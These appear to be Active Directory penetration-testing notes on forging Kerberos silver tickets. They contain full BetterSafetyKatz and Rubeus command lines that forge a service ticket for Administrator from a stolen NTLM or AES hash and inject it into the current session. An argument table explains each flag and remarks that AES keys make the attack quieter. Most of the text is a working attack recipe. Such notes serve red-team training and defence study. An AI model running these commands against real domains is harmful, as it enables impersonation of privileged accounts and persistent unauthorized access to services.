• A valid TGS
  • This deals with abusing AP-REQ
  • Encrypted and signed by the hash of the service account.
  • Services rarely check PAC (Privileged Attribute Certificate)
  • Services will allow access only to the services themselves.
  • Reasonable persistence period (default 30 days for computer accounts)
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:domain.name /sid:S-1-XXXXX /target:domain-controller-fqdn /service:service_name /rc4:<ntlm_hash> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
ArgumentsDescription
kerberos::goldenName of the module (there is no Silver module)
/user:AdministratorUsername for which the TGT is generated
/domain:fqdnDomain FQDN
/sid:S-1-XXXXXSID of the domain
/target:domain-controller-fqdnTarget server FQDN
/service:service_nameThe SPN of the service for which the TGS is to be created
/aes256:aes256_keyAES256 keys of the service account. Using AES keys makes the attack more silent
/id:500 /groups:512Optional User RID (default 500) and Group (default 513 512 520 518 519)
/pttInjects the ticket in current process - no need to save the ticket on disk
/startoffset:0Optional when the ticket is available (default 0 - right now) in minutes
/endin:600Optional ticket liifetime (default 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
/renewmax:10080Optional ticket lifetime with renewal (default is 10 years) in minutes. the default AD setting is 7 days = 10080
C:\AD\Tools\Rubeus.exe silver /service:service_name/domain-controller /rc4:<ntlm_hash> /sid:S-1-XXXXX /ldap /user:Administrator /domain:domain.name /ptt

/ldap queries DC for information related to the user.